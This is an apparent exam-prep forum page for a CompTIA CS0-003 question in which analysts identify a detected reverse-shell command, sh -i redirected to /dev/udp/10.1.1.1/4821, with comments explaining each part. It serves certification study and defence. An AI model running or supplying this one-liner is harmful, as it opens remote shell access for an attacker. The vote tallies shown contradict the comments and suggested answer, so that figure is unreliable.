Welcome to ExamTopics
ExamTopics Logo
- Expert Verified, Online, Free.

Unlimited Access

Get Unlimited Contributor Access to the all ExamTopics Exams!
Take advantage of PDF Files for 1000+ Exams along with community discussions and pass IT Certification Exams Easily.

Exam CS0-003 topic 1 question 39 discussion

Actual exam question from CompTIA's CS0-003
Question #: 39
Topic #: 1
[All CS0-003 Questions]

A security analyst detects an exploit attempt containing the following command: sh -i >& /dev/udp/10.1.1.1/4821 0>$l
Which of the following is being attempted?

• A. RCE
  • B. Reverse shell
  • C. XSS
  • D. SQL injection
Show Suggested Answer Hide Answer
Suggested Answer: B 🗳️

Comments

Chosen Answer:
This is a voting comment (?) , you can switch to a simple comment.
Switch to a voting comment New
nmap_king_22
Highly Voted 8 months, 1 week ago
Selected Answer: B
The command sh -i >& /dev/udp/10.1.1.1/4821 0>$l is indicative of an attempt to establish a reverse shell. Therefore, the correct answer is: B. Reverse shell
upvoted 7 times
glenndexter
Most Recent 1 week, 5 days ago
The command sh -i >& /dev/udp/10.1.1.1/4821 0>$l is attempting to establish a reverse shell. In this command: sh -i: Launches the Bourne shell (sh) in interactive mode (-i), allowing for interactive command execution. >&: Redirects both standard output and standard error. /dev/udp/10.1.1.1/4821: Specifies the destination for the redirected output, in this case, an IP address (10.1.1.1) and port (4821) using UDP. 0>$l: Redirects file descriptor 0 (standard input) to an undefined variable $l. This command is attempting to establish a shell connection back to the specified IP address and port, effectively allowing the attacker to gain remote access to the system.
upvoted 2 times
Alizade
5 months, 3 weeks ago
The answer is B. Reverse shell
upvoted 1 times
kmordalv
8 months ago
Correct This command is a shell script that creates a reverse shell connection from the target system to the remote user’s system at IP address 10.1.1.1 and port 4821 using UDP protocol.
upvoted 4 times
Community vote distribution
A (35%)
C (25%)
B (20%)
Other
Most Voted
A voting comment increases the vote count for the chosen answer by one.

Upvoting a comment with a selected answer will also increase the vote count towards that answer by one. So if you see a comment that you already agree with, you can upvote it instead of posting a new comment.

SaveCancel
Loading ...